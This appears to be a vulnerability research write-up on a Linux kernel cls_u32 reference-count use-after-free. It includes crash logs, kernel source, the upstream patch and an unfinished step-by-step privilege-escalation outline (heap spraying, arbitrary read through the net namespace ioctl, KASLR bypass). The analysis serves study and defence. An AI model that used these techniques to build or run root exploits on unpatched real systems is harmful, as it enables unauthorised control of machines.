-->

The Linux Kernel Network Scheduler Vulnerabilities and Exploits - Privilege Escalation

 


The u32 filter Overview

Where the module is:

net/sched/cls_u32.c

Ugly (or Universal) 32bit key Packet Classifier.

Linux TC (traffic control) Flow Control Introduction

Linux TC imposes different throughput and delay limits on multiple specific ip

Netlink and TC 

TC is implemented based on the Netlink protocol.


Default Qdisc

Multi-queue default Qdisc

A custom qdisc setup

One Example

Transmission quality control, transmission bandwidth and delay


Using some SHELL commands can realize the use of TC. It can also be realized through Netlink programming.

Vulnerability Mining

For the 2021 Tianfu Cup competition, I sorted out the loopholes that syzkaller played locally before. Found a UAF vulnerability on the exclusive SLAB, because this kind of vulnerability has not been used before, but reported the mentality of giving it a try.


The vulnerability was analyzed by Liu Yong, and it was found that the UAF’s vulnerability in the exclusive SLAB may be able to achieve privilege escalation. The exploit will be realized around October. And because there are other loopholes that can participate in the competition, and the concealment of this loophole and the success rate of privilege escalation are relatively good, and one loophole can complete information leakage and privilege escalation, so it is reserved.
[  203.112091] ==================================================================
[  203.112113] BUG: KASAN: use-after-free in sock_prot_inuse_add+0x80/0x90
[  203.112121] Read of size 8 at addr ffff888106660188 by task poc/6597

[  203.112134] CPU: 0 PID: 6597 Comm: poc Tainted: G                 ---------r-  - 4.18.0+ #32
[  203.112138] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  203.112140] Call Trace:
[  203.112148]  dump_stack+0xa4/0xea
[  203.112164]  print_address_description.constprop.5+0x1e/0x230
[  203.112197]  __kasan_report.cold.7+0x37/0x82
[  203.112210]  kasan_report+0x3b/0x50
[  203.112217]  sock_prot_inuse_add+0x80/0x90
[  203.112224]  netlink_release+0x97f/0x1190
[  203.112257]  __sock_release+0xd3/0x2b0
[  203.112262]  sock_close+0x1e/0x30
[  203.112267]  __fput+0x2d4/0x840
[  203.112275]  task_work_run+0x16e/0x1d0
[  203.112284]  exit_to_usermode_loop+0x207/0x230
[  203.112290]  do_syscall_64+0x3f5/0x470
[  203.112302]  entry_SYSCALL_64_after_hwframe+0x65/0xca
[  203.112308] RIP: 0033:0x7fee34abd1a8
[  203.112315] Code: 07 02 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f3 0f 1e fa 48 8d 05 b5 44 2d 00 8b 00 85 c0 75 17 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 40 c3 0f 1f 80 00 00 00 00 53 89 fb 48 83 ec
[  203.112318] RSP: 002b:00007ffdb62366c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[  203.112323] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007fee34abd1a8
[  203.112327] RDX: 0000000000000000 RSI: 00000000200001c0 RDI: 0000000000000004
[  203.112330] RBP: 00007ffdb62366e0 R08: 00007ffdb62366e0 R09: 00007ffdb62366e0
[  203.112333] R10: 00007ffdb62366e0 R11: 0000000000000246 R12: 0000000000400f50
[  203.112337] R13: 00007ffdb6236820 R14: 0000000000000000 R15: 0000000000000000

[  203.112345] Allocated by task 6247:
[  203.112353]  kasan_save_stack+0x1d/0x80
[  203.112359]  __kasan_kmalloc.constprop.10+0xc1/0xd0
[  203.112367]  slab_post_alloc_hook+0x43/0x280
[  203.112377]  kmem_cache_alloc+0x131/0x280
[  203.112386]  copy_net_ns+0xec/0x330
[  203.112395]  create_new_namespaces+0x583/0x9a0
[  203.112404]  unshare_nsproxy_namespaces+0xcb/0x200
[  203.112414]  ksys_unshare+0x468/0x8d0
[  203.112423]  __x64_sys_unshare+0x36/0x50
[  203.112432]  do_syscall_64+0xe4/0x470
[  203.112443]  entry_SYSCALL_64_after_hwframe+0x65/0xca

[  203.112453] Freed by task 59:
[  203.112487]  kasan_save_stack+0x1d/0x80
[  203.112510]  kasan_set_track+0x20/0x30
[  203.112535]  kasan_set_free_info+0x1f/0x30
[  203.112557]  __kasan_slab_free+0x108/0x150
[  203.112578]  kmem_cache_free+0x83/0x430
[  203.112593]  net_drop_ns+0x7d/0x90
[  203.112604]  cleanup_net+0x6ee/0x960
[  203.112619]  process_one_work+0x742/0x1030
[  203.112632]  worker_thread+0x95/0xce0
[  203.112643]  kthread+0x32c/0x3f0
[  203.112654]  ret_from_fork+0x35/0x40

[  203.112686] The buggy address belongs to the object at ffff888106660000
                which belongs to the cache net_namespace of size 8000
[  203.112698] The buggy address is located 392 bytes inside of
                8000-byte region [ffff888106660000, ffff888106661f40)
[  203.112704] The buggy address belongs to the page:
[  203.112739] page:ffffea0004199800 refcount:1 mapcount:0 mapping:00000000306a7880 index:0xffff888106664080 head:ffffea0004199800 order:3 compound_mapcount:0 compound_pincount:0
[  203.112752] flags: 0x17ffffc0008100(slab|head)
[  203.112774] raw: 0017ffffc0008100 dead000000000100 dead000000000200 ffff88810b6ff600
[  203.112792] raw: ffff888106664080 0000000080030002 00000001ffffffff ffff888101f819c1
[  203.112798] page dumped because: kasan: bad access detected
[  203.112803] pages's memcg:ffff888101f819c1

[  203.112814] Memory state around the buggy address:
[  203.112831]  ffff888106660080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112857]  ffff888106660100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112868] >ffff888106660180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112873]                       ^
[  203.112884]  ffff888106660200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112894]  ffff888106660280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112900] =================================================================
However, on 2022/04/12, a similar vulnerability was found on syzbot, which was a Warning, and was subsequently fixed by the community. Finally, this exploit was exported to domestic security competitions.


Vulnerability Principle

Original PoC

The PoC automatically converted by syzkaller can trigger the vulnerability stably. 

Distribute

unshare
|-> __x64_sys_unshare
 |-> ksys_unshare
  |-> unshare_nsproxy_namespaces
   |-> copy_net_ns
    |-> kmem_cache_alloc
freed
exit_process
 |-> ret_from_fork
  |-> kthread
   |-> worker_thread
    |-> process_one_work
     |-> cleanup_net
      |-> net_drop_ns
       |-> kmem_cache_free
UAF
sock_close
 |-> exit_to_usermode_loop
  |-> task_work_run
   |-> __fput
    |-> sock_close
     |-> __sock_release
      |-> sock_prot_inuse_add
Distributing the source code of net
net/core/net_namespace.c
445 struct net *copy_net_ns(unsigned long flags,
 446                         struct user_namespace *user_ns, struct net *old_net)
 447 {
 448         struct ucounts *ucounts;
 449         struct net *net;
 450         int rv;
 451 
 452         if (!(flags & CLONE_NEWNET))
 453                 return get_net(old_net);
 454 
 455         ucounts = inc_net_namespaces(user_ns);
 456         if (!ucounts)
 457                 return ERR_PTR(-ENOSPC);
 458 
 459         net = net_alloc();    <---
 460         if (!net) {
 461                 rv = -ENOMEM;
 462                 goto dec_ucounts;
 463         }
 464         refcount_set(&net->passive, 1);
 465         net->ucounts = ucounts;
 466         get_user_ns(user_ns);
....
 487         return net;
 488 }
 395 static struct net *net_alloc(void)
 396 {
 397         struct net *net = NULL;
 398         struct net_generic *ng;
 399 
 400         ng = net_alloc_generic();
 401         if (!ng)
 402                 goto out;
 403 
 404         net = kmem_cache_zalloc(net_cachep, GFP_KERNEL);    <---
 405         if (!net)
 406                 goto out_free;
 407 
....
 427 }
$ sudo cat /sys/kernel/slab/net_namespace/object_size 
4928
$ sudo cat /sys/kernel/slab/net_namespace/order 
3
release function
437 void net_drop_ns(void *p)
 438 {
 439         struct net *net = (struct net *)p;
 440 
 441         if (net)
 442                 net_free(net);
 443 }       
 444
The structure of UAF (hereinafter, net_namespace is collectively referred to as the net structure)
 56 struct net {
 57         /* First cache line can be often dirtied.
 58         |* Do not place here read-mostly fields.
 59         |*/
 60         refcount_t              passive;        /* To decide when the network
 61                                                 |* namespace should be freed.
 62                                                 |*/
 63         spinlock_t              rules_mod_lock;
 64 
 65         unsigned int            dev_unreg_count;
 66 
 67         unsigned int            dev_base_seq;   /* protected by rtnl_mutex */
 68         int                     ifindex;
 69 
 70         spinlock_t              nsid_lock;
 71         atomic_t                fnhe_genid;
 72 
 73         struct list_head        list;           /* list of network namespaces */
 74         struct list_head        exit_list;      /* To linked to call pernet exit
 75                                                 |* methods on dead net (
 76                                                 |* pernet_ops_rwsem read locked),
 77                                                 |* or to unregister pernet ops
 78                                                 |* (pernet_ops_rwsem write locked).
 79                                                 |*/
 80         struct llist_node       cleanup_list;   /* namespaces on death row */
 81 
 82 #ifdef CONFIG_KEYS
 83         struct key_tag          *key_domain;    /* Key domain of operation tag */
 84 #endif
 85         struct user_namespace   *user_ns;       /* Owning user namespace */
 86         struct ucounts          *ucounts;
 87         struct idr              netns_ids;
 88 
 89         struct ns_common        ns;    <---/*现实任意地址读*/
 90 
 91         struct list_head        dev_base_head;
 92         struct proc_dir_entry   *proc_net;
 93         struct proc_dir_entry   *proc_net_stat;
 94 
 95 #ifdef CONFIG_SYSCTL
 96         struct ctl_table_set    sysctls;
 97 #endif
 98 
 99         struct sock             *rtnl;                  /* rtnetlink socket */
100         struct sock             *genl_sock;
101 
102         struct uevent_sock      *uevent_sock;           /* uevent socket */
103 
104         struct hlist_head       *dev_name_head;
105         struct hlist_head       *dev_index_head;
106         struct raw_notifier_head        netdev_chain;
107 
108         /* Note that @hash_mix can be read millions times per second,
109         |* it is critical that it is on a read_mostly cache line.
110         |*/
111         u32                     hash_mix;
112 
113         struct net_device       *loopback_dev;          /* The loopback */
114 
115         /* core fib_rules */
116         struct list_head        rules_ops;
117 
118         struct netns_core       core;
119         struct netns_mib        mib;
120         struct netns_packet     packet;
121         struct netns_unix       unx;
122         struct netns_nexthop    nexthop;
123         struct netns_ipv4       ipv4;
124 #if IS_ENABLED(CONFIG_IPV6)
125         struct netns_ipv6       ipv6;
126 #endif
127 #if IS_ENABLED(CONFIG_IEEE802154_6LOWPAN)
128         struct netns_ieee802154_lowpan  ieee802154_lowpan;
129 #endif
130 #if defined(CONFIG_IP_SCTP) || defined(CONFIG_IP_SCTP_MODULE)
131         struct netns_sctp       sctp;
132 #endif
133 #ifdef CONFIG_NETFILTER
134         struct netns_nf         nf;
135 #if defined(CONFIG_NF_CONNTRACK) || defined(CONFIG_NF_CONNTRACK_MODULE)
136         struct netns_ct         ct;
137 #endif
138 #if defined(CONFIG_NF_TABLES) || defined(CONFIG_NF_TABLES_MODULE)
139         struct netns_nftables   nft;
140 #endif
141 #endif
142 #ifdef CONFIG_WEXT_CORE
143         struct sk_buff_head     wext_nlevents;
144 #endif
145         struct net_generic __rcu        *gen;
146 
147         /* Used to store attached BPF programs */
148         struct netns_bpf        bpf;
149 
150         /* Note : following structs are cache line aligned */
151 #ifdef CONFIG_XFRM
152         struct netns_xfrm       xfrm;
153 #endif
154 
155         u64                     net_cookie; /* written once */
156 
157 #if IS_ENABLED(CONFIG_IP_VS)
158         struct netns_ipvs       *ipvs;
159 #endif
160 #if IS_ENABLED(CONFIG_MPLS)
161         struct netns_mpls       mpls;
162 #endif
163 #if IS_ENABLED(CONFIG_CAN)
164         struct netns_can        can;
165 #endif
166 #ifdef CONFIG_XDP_SOCKETS
167         struct netns_xdp        xdp;
168 #endif
169 #if IS_ENABLED(CONFIG_MCTP)
170         struct netns_mctp       mctp;
171 #endif
172 #if IS_ENABLED(CONFIG_CRYPTO_USER)
173         struct sock             *crypto_nlsk;
174 #endif
175         struct sock             *diag_nlsk;
176 #if IS_ENABLED(CONFIG_SMC)
177         struct netns_smc        smc;
178 #endif
179 } __randomize_layout;

PoC Rewriting

After further analysis, it is because the u32_change function will incorrectly reduce the reference count of nets, which leads to the logic problem of UAF. Starting from this, the trigger path of PoC is optimized.
u32_change()
 |--> u32_destroy_key()
  |--> tcf_exts_put_net()
   |--> put_net()
At the same time, a logical primitive that subtracts 1 from the reference count on the net is constructed.


The optimized trigger process is as follows:
[  253.623920] ------------[ cut here ]------------
[  253.623929] refcount_t: underflow; use-after-free.
[  253.623984] WARNING: CPU: 0 PID: 4009 at lib/refcount.c:28 refcount_warn_saturate+0x10c/0x1f0
[  253.624026] Modules linked in: act_police cls_u32 ip6_gre gre ip6_tunnel tunnel6 uas usb_storage binfmt_misc snd_seq_dummy snd_hrtimer vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock snd_ens1371 snd_ac97_codec gameport ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_msr intel_rapl_common nls_iso8859_1 snd_seq crct10dif_pclmul ghash_clmulni_intel sch_fq_codel aesni_intel snd_seq_device crypto_simd snd_timer cryptd snd vmw_balloon joydev rapl input_leds soundcore vmw_vmci serio_raw vmwgfx ttm drm_kms_helper mac_hid cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt ipmi_devintf ipmi_msghandler msr parport_pc ppdev lp drm parport ip_tables x_tables autofs4 hid_generic crc32_pclmul psmouse usbhid ahci mptspi hid libahci mptscsih e1000 mptbase scsi_transport_spi i2c_piix4 pata_acpi floppy
[  253.624306] CPU: 0 PID: 4009 Comm: apparmor_parser Tainted: G    B             5.15.30+ #2
[  253.624330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  253.624338] RIP: 0010:refcount_warn_saturate+0x10c/0x1f0
[  253.624351] Code: 1d 6d 3a 1d 03 31 ff 89 de e8 90 f1 18 ff 84 db 75 a0 e8 47 f6 18 ff 48 c7 c7 e0 f0 65 85 c6 05 4d 3a 1d 03 01 e8 f2 76 57 01 <0f> 0b eb 84 e8 2b f6 18 ff 0f b6 1d 36 3a 1d 03 31 ff 89 de e8 5b
[  253.624361] RSP: 0000:ffff888137fafc90 EFLAGS: 00010282
[  253.624369] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  253.624376] RDX: ffff88810caf0000 RSI: 0000000000000100 RDI: ffffed1026ff5f84
[  253.624383] RBP: ffff888137fafca0 R08: 0000000000000100 R09: ffff8881e183098b
[  253.624390] R10: 0000000000000000 R11: 0000000000000001 R12: ffff888120ec008c
[  253.624397] R13: ffff888105f42000 R14: ffff888120ec0000 R15: ffff888120ec008c
[  253.624404] FS:  00007fc64fc8d740(0000) GS:ffff8881e1800000(0000) knlGS:0000000000000000
[  253.624414] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  253.624421] CR2: 000055893f3fadf9 CR3: 0000000135002001 CR4: 00000000003706f0
[  253.624445] Call Trace:
[  253.624451]  <TASK>
[  253.624458]  __sk_destruct+0x693/0x790
[  253.624478]  sk_destruct+0xd3/0x100
[  253.624494]  __sk_free+0xfe/0x400
[  253.624509]  sk_free+0x88/0xc0
[  253.624524]  deferred_put_nlk_sk+0x170/0x320
[  253.624544]  rcu_core+0x51a/0x1250
[  253.624607]  rcu_core_si+0xe/0x10
[  253.624618]  __do_softirq+0x189/0x536
[  253.624631]  irq_exit_rcu+0xec/0x130
[  253.624641]  sysvec_apic_timer_interrupt+0x40/0x90
[  253.624664]  asm_sysvec_apic_timer_interrupt+0x12/0x20
[  253.624675] RIP: 0033:0x55893f2e92d2
[  253.624685] Code: c3 0f 1f 80 00 00 00 00 48 39 cb 74 3b 48 8b 7d 10 49 89 d8 4c 89 ee 48 8b 07 48 89 54 24 68 44 89 f2 48 89 4c 24 60 4c 89 e1 <48> 8b 40 38 48 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f ff e0 66 2e
[  253.624694] RSP: 002b:00007ffc26b6c960 EFLAGS: 00000202
[  253.624703] RAX: 000055893f3ec3a0 RBX: 0000558940c048d0 RCX: 000055893f3eb588
[  253.624710] RDX: 0000000000000006 RSI: 0000000000000000 RDI: 000055893f3eb510
[  253.624717] RBP: 000055893f3eb528 R08: 0000558940c048d0 R09: 000055893f3eb4a0
[  253.624723] R10: 0000558940e14270 R11: 00007fc64fea9ce0 R12: 000055893f3eb588
[  253.624730] R13: 0000000000000000 R14: 0000000000000006 R15: 000055893f3a48e8
[  253.624740]  </TASK>
[  253.624743] ---[ end trace ddbeecae4d8b2b8c ]---
[  253.626421] ------------[ cut here ]------------
[  253.626431] refcount_t: saturated; leaking memory.
[  253.626489] WARNING: CPU: 3 PID: 309 at lib/refcount.c:19 refcount_warn_saturate+0x1bd/0x1f0
[  253.626513] Modules linked in: act_police cls_u32 ip6_gre gre ip6_tunnel tunnel6 uas usb_storage binfmt_misc snd_seq_dummy snd_hrtimer vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock snd_ens1371 snd_ac97_codec gameport ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_msr intel_rapl_common nls_iso8859_1 snd_seq crct10dif_pclmul ghash_clmulni_intel sch_fq_codel aesni_intel snd_seq_device crypto_simd snd_timer cryptd snd vmw_balloon joydev rapl input_leds soundcore vmw_vmci serio_raw vmwgfx ttm drm_kms_helper mac_hid cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt ipmi_devintf ipmi_msghandler msr parport_pc ppdev lp drm parport ip_tables x_tables autofs4 hid_generic crc32_pclmul psmouse usbhid ahci mptspi hid libahci mptscsih e1000 mptbase scsi_transport_spi i2c_piix4 pata_acpi floppy
[  253.626837] CPU: 3 PID: 309 Comm: kworker/u256:28 Tainted: G    B   W         5.15.30+ #2
[  253.626851] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  253.626859] Workqueue: netns cleanup_net
[  253.626874] RIP: 0010:refcount_warn_saturate+0x1bd/0x1f0
[  253.626888] Code: 03 31 ff 89 de e8 e3 f0 18 ff 84 db 0f 85 ef fe ff ff e8 96 f5 18 ff 48 c7 c7 e0 ef 65 85 c6 05 9f 39 1d 03 01 e8 41 76 57 01 <0f> 0b e9 d0 fe ff ff e8 77 f5 18 ff 48 c7 c7 40 f1 65 85 c6 05 7c
[  253.626899] RSP: 0000:ffff8881032ff688 EFLAGS: 00010282
[  253.626908] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  253.626915] RDX: ffff888103093380 RSI: 0000000000000000 RDI: ffffed102065fec3
[  253.626922] RBP: ffff8881032ff698 R08: 0000000000000000 R09: ffff8881e19b098b
[  253.626930] R10: 0000000000000000 R11: 0000000000000001 R12: ffff888120ec008c
[  253.626936] R13: ffff88812dc76500 R14: dffffc0000000000 R15: 00000000c0000000
[  253.626944] FS:  0000000000000000(0000) GS:ffff8881e1980000(0000) knlGS:0000000000000000
[  253.626954] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  253.626961] CR2: 00007f2ede8e1024 CR3: 00000001736a6006 CR4: 00000000003706e0
[  253.626993] Call Trace:
[  253.626997]  <TASK>
[  253.627006]  u32_clear_hnode+0x4c7/0x680 [cls_u32]
[  253.627058]  u32_destroy_hnode.isra.0+0xa4/0x240 [cls_u32]
[  253.627069]  u32_destroy+0x2da/0x390 [cls_u32]
[  253.627080]  tcf_proto_destroy+0x85/0x300
[  253.627091]  tcf_proto_put+0x9c/0xd0
[  253.627101]  tcf_chain_flush+0x1c0/0x310
[  253.627112]  __tcf_block_put+0x158/0x2e0
[  253.627123]  tcf_block_put+0xe3/0x130
[  253.627178]  fq_codel_destroy+0x3c/0xb0 [sch_fq_codel]
[  253.627189]  qdisc_destroy+0xb1/0x2a0
[  253.627200]  qdisc_put+0xe0/0x100
[  253.627211]  dev_shutdown+0x253/0x390
[  253.627224]  unregister_netdevice_many+0x7e0/0x1720
[  253.627282]  ip6gre_exit_batch_net+0x36b/0x450 [ip6_gre]
[  253.627367]  ops_exit_list+0x115/0x160
[  253.627378]  cleanup_net+0x475/0xb40
[  253.627403]  process_one_work+0x8bf/0x11d0
[  253.627416]  worker_thread+0x60b/0x1340
[  253.627441]  kthread+0x388/0x470
[  253.627461]  ret_from_fork+0x22/0x30
[  253.627476]  </TASK>
[  253.627480] ---[ end trace ddbeecae4d8b2b8d ]---

Vulnerability Patch

In the u32_change function, the tcf_exts_put_net function (decreases the reference count on nets by 1) should not be executed.
author Eric Dumazet <edumazet@google.com> 2022-04-13 10:35:41 -0700
committer Jakub Kicinski <kuba@kernel.org> 2022-04-15 14:26:11 -0700
commit 3db09e762dc79584a69c10d74a6b98f89a9979f8 (patch)
tree 1a269d290124f61d42c2cb059de92a0661f818a5
parent f3226eed54318e7bdc186f8f7ed27bcd3cb8b681 (diff)
download linux-3db09e762dc79584a69c10d74a6b98f89a9979f8.tar.gz
net/sched: cls_u32: fix netns refcount changes in u32_change()
We are now able to detect extra put_net() at the moment
they happen, instead of much later in correct code paths.

u32_init_knode() / tcf_exts_init() populates the ->exts.net
pointer, but as mentioned in tcf_exts_init(),
the refcount on netns has not been elevated yet.

The refcount is taken only once tcf_exts_get_net()
is called.

So the two u32_destroy_key() calls from u32_change()
are attempting to release an invalid reference on the netns.

syzbot report:

refcount_t: decrement hit 0; leaking memory.
WARNING: CPU: 0 PID: 21708 at lib/refcount.c:31 refcount_warn_saturate+0xbf/0x1e0 lib/refcount.c:31
Modules linked in:
CPU: 0 PID: 21708 Comm: syz-executor.5 Not tainted 5.18.0-rc2-next-20220412-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
RIP: 0010:refcount_warn_saturate+0xbf/0x1e0 lib/refcount.c:31
Code: 1d 14 b6 b2 09 31 ff 89 de e8 6d e9 89 fd 84 db 75 e0 e8 84 e5 89 fd 48 c7 c7 40 aa 26 8a c6 05 f4 b5 b2 09 01 e8 e5 81 2e 05 <0f> 0b eb c4 e8 68 e5 89 fd 0f b6 1d e3 b5 b2 09 31 ff 89 de e8 38
RSP: 0018:ffffc900051af1b0 EFLAGS: 00010286
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000040000 RSI: ffffffff8160a0c8 RDI: fffff52000a35e28
RBP: 0000000000000004 R08: 0000000000000000 R09: 0000000000000000
R10: ffffffff81604a9e R11: 0000000000000000 R12: 1ffff92000a35e3b
R13: 00000000ffffffef R14: ffff8880211a0194 R15: ffff8880577d0a00
FS:  00007f25d183e700(0000) GS:ffff8880b9c00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f19c859c028 CR3: 0000000051009000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
 <TASK>
 __refcount_dec include/linux/refcount.h:344 [inline]
 refcount_dec include/linux/refcount.h:359 [inline]
 ref_tracker_free+0x535/0x6b0 lib/ref_tracker.c:118
 netns_tracker_free include/net/net_namespace.h:327 [inline]
 put_net_track include/net/net_namespace.h:341 [inline]
 tcf_exts_put_net include/net/pkt_cls.h:255 [inline]
 u32_destroy_key.isra.0+0xa7/0x2b0 net/sched/cls_u32.c:394
 u32_change+0xe01/0x3140 net/sched/cls_u32.c:909
 tc_new_tfilter+0x98d/0x2200 net/sched/cls_api.c:2148
 rtnetlink_rcv_msg+0x80d/0xb80 net/core/rtnetlink.c:6016
 netlink_rcv_skb+0x153/0x420 net/netlink/af_netlink.c:2495
 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
 netlink_unicast+0x543/0x7f0 net/netlink/af_netlink.c:1345
 netlink_sendmsg+0x904/0xe00 net/netlink/af_netlink.c:1921
 sock_sendmsg_nosec net/socket.c:705 [inline]
 sock_sendmsg+0xcf/0x120 net/socket.c:725
 ____sys_sendmsg+0x6e2/0x800 net/socket.c:2413
 ___sys_sendmsg+0xf3/0x170 net/socket.c:2467
 __sys_sendmsg+0xe5/0x1b0 net/socket.c:2496
 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f25d0689049
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f25d183e168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007f25d079c030 RCX: 00007f25d0689049
RDX: 0000000000000000 RSI: 0000000020000340 RDI: 0000000000000005
RBP: 00007f25d06e308d R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffd0b752e3f R14: 00007f25d183e300 R15: 0000000000022000
 </TASK>

Fixes: 35c55fc156d8 ("cls_u32: use tcf_exts_get_net() before call_rcu()")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: syzbot <syzkaller@googlegroups.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: Jiri Pirko <jiri@resnulli.us>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
Diffstat
-rw-r--r-- net/sched/cls_u32.c 16 
1 files changed, 10 insertions, 6 deletions
diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
index cf5649292ee00..fcba6c43ba509 100644
--- a/net/sched/cls_u32.c
+++ b/net/sched/cls_u32.c
@@ -386,14 +386,19 @@ static int u32_init(struct tcf_proto *tp)
  return 0;
 }

-static int u32_destroy_key(struct tc_u_knode *n, bool free_pf)
+static void __u32_destroy_key(struct tc_u_knode *n)
 {
  struct tc_u_hnode *ht = rtnl_dereference(n->ht_down);

  tcf_exts_destroy(&n->exts);
- tcf_exts_put_net(&n->exts);
  if (ht && --ht->refcnt == 0)
   kfree(ht);
+ kfree(n);
+}
+
+static void u32_destroy_key(struct tc_u_knode *n, bool free_pf)
+{
+ tcf_exts_put_net(&n->exts);
 #ifdef CONFIG_CLS_U32_PERF
  if (free_pf)
   free_percpu(n->pf);
@@ -402,8 +407,7 @@ static int u32_destroy_key(struct tc_u_knode *n, bool free_pf)
  if (free_pf)
   free_percpu(n->pcpu_success);
 #endif
- kfree(n);
- return 0;
+ __u32_destroy_key(n);
 }

 /* u32_delete_key_rcu should be called when free'ing a copied
@@ -900,13 +904,13 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
         extack);

   if (err) {
-   u32_destroy_key(new, false);
+   __u32_destroy_key(new);
    return err;
   }

   err = u32_replace_hw_knode(tp, new, flags, extack);
   if (err) {
-   u32_destroy_key(new, false);
+   __u32_destroy_key(new);
    return err;
   }

Problem Introduction

commit 35c55fc156d85a396a975fc17636f560fc02fd65
Author: Cong Wang <xiyou.wangcong@gmail.com>
Date:   Mon Nov 6 13:47:30 2017 -0800

    cls_u32: use tcf_exts_get_net() before call_rcu()

    Hold netns refcnt before call_rcu() and release it after
    the tcf_exts_destroy() is done.

    Note, on ->destroy() path we have to respect the return value
    of tcf_exts_get_net(), on other paths it should always return
    true, so we don't need to care.

    Cc: Lucas Bates <lucasb@mojatatu.com>
    Cc: Jamal Hadi Salim <jhs@mojatatu.com>
    Cc: Jiri Pirko <jiri@resnulli.us>
    Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
    Signed-off-by: David S. Miller <davem@davemloft.net>

diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
index dadd1b344497..b58eccb21f03 100644
--- a/net/sched/cls_u32.c
+++ b/net/sched/cls_u32.c
@@ -399,6 +399,7 @@ static int u32_destroy_key(struct tcf_proto *tp, struct tc_u_knode *n,
                           bool free_pf)
 {
        tcf_exts_destroy(&n->exts);
+       tcf_exts_put_net(&n->exts);
        if (n->ht_down)
                n->ht_down->refcnt--;
 #ifdef CONFIG_CLS_U32_PERF
@@ -476,6 +477,7 @@ static int u32_delete_key(struct tcf_proto *tp, struct tc_u_knode *key)
                                RCU_INIT_POINTER(*kp, key->next);

                                tcf_unbind_filter(tp, &key->res);
+                               tcf_exts_get_net(&key->exts);
                                call_rcu(&key->rcu, u32_delete_key_freepf_rcu);
                                return 0;
                        }
Therefore, the time range affected by the vulnerability is from November 6, 2017 to April 13, 2022, which lasts for 4 and a half years.

Timeline

TimeLine
July 27, 2021Confirm Vulnerability
October 2021Complete the exploit
April 12, 2022syzbot hits a similar vulnerability
April 13, 2022community tinkering
August 2022Participate in domestic competitions

Exploit

The steps of vulnerability exploitation are divided into:
  • Through information leakage and address randomization;
  • Elevate permissions through run_cmd.

Information Leakage

Step 1: Heap Layout
  • Fill the idle net in SLAB
  • Eat all the pages of the net-specific SLAB in the cache, so that the newly allocated net can use the pages newly allocated by the system. The yellow area in the figure represents the net objects of heap spraying, such as SLAB 1 and SLAB 2 in the figure.
  • Create a victim net from the newly allocated slab
  • Indicated by the red area in the figure.
  • Then eat all the slab where the victim is located.
  • As shown in the figure, slab A and slab B both use net objects to fill up the 8 page-sized slabs.
Step 2: mount net name space

In order to access the victim's reference through this file later.
mount("/proc/self/ns/net", "./mynetns", "nsfs", MS_BIND, NULL)
Step 3: Return the page where the victim is located to the partner system

Decrease Victim's reference count by 1 via u32_destroy_key

Step 4: User-mode mmap heap sprays the physical page where the victim is located

Return the physical page to the system in the third step just now, and allocate it through mmap.

Step 5: Construct an arbitrary address read

On the file obtained through mount, call ioctl(NS_GET_NSTYPE), and the user mode can get the value of ns->ops->type. Because the value of ops is controllable, it can realize arbitrary address reading.

Step 6: Read cpu_area_entry, bypass Kaslr

Because the virtual address (0xfffffe0000000000) of cpu_area_entry in the system is fixed, and this address contains a kernel code segment address after Kaslr. So the offset can be calculated to bypass Kaslr.

fs/nsfs.c
88 static long ns_ioctl(struct file *filp, unsigned int ioctl,
